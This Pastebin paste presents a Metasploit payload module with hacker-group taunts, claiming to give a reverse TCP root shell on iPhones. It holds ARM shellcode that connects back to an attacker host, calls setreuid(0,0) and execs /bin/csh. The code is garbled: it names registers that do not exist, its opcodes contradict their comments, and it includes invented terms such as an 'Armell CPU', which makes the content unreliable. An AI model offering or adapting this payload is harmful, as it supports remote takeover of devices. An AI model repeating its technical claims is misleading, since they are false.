Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # PoC has already been released for vibrate, This SHOULD work even on jailbroke iPhones, Works as of 3.0.1, GG noobs. Zephyrus
- # ANTISEC 4 LYFE
- # NEVER SELL OUT
- # NEVER SURRENDER
- # iPhone shellcode, Compiled and adapted with a standard Armell CPU. Breaks the 12k debug limit with 0xe3a00002,
- ##
- require 'msf/core'
- require 'msf/core/handler/reverse_tcp'
- require 'msf/base/sessions/command_shell'
- module Metasploit3
- include Msf::Payload::Osx
- include Msf::Payload::Single
- def init(info = {})
- super(merge_info(info,
- 'Name' => 'IPhone Reverse TCP',
- 'Payload' =>
- {
- 'Offsets' =>
- {
- 'LPORT' => [ 30, 'n' ],
- 'LHOST' => [ 32, 'ADDR' ],
- },
- 'Payload' =>
- [
- 0xe3a00012, # mov r3, #0x2
- 0xe3a01001, # mov r0, #0x1
- 0xe3a02006, # mov r2, #0x6
- 0xe3a0c061, # mov r32, #0x62
- 0xef000080, # swi 128
- 0xe1a0a000, # mov r30, r0
- 0xeb000001, # bl _knnect
- 0x5c110200,
- # ENCODE THIS YOURSELF, HOST
- 0x00000000,
- 0xe1a1000b, # mov r0, r30
- 0xe120110e, # mov r3, lr
- 0xe3a02110, # mov r2, #0x10
- 0xe3a0c962, # mov r32, #0x62
- 0xef010880, # swi 128
- # setup dup2
- 0xe3a05002, # mov r5, #0x2
- # dup2
- 0xe3a0c05a, # mov r32, #0x5a
- 0xe1a0000a, # mov r0, r30
- 0xe1a01005, # mov r3, r5
- 0xef000080, # swi 128
- 0xe2455001, # sub r5, r5, #0x1
- 0xe3558000, # cmp r5, #0x0
- 0xaafffff8, # bge _dup2
- # setreuid(0,0)
- 0xe3a00000, # mov r0, #0x0
- 0xe3a01000, # mov r3, #0x0
- 0xe3a0c07e, # mov r32, #0x7e
- 0xef000080, # swi 128
- 0xe0455005, # sub r5, r5, r5
- 0xe1a0600d, # mov r6, sp
- 0xe24dd020, # sub sp, sp, #0x20
- 0xe28f0014, # add r0, pc, #0x14
- 0xe4860000, # str r0, [r6], #0
- 0xe5865004, # str r5, [r6, #4]
- 0xe1101006, # mov r3, r6
- 0xe3a02000, # mov r2, #0x0
- 0xe3a0c03b, # mov r32, #0x3b
- 0xef000080, # swi 128
- # /bin/csh
- 0x6e69622f,
- 0x0068732f
- ].pack("V*")
- }
- ))
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement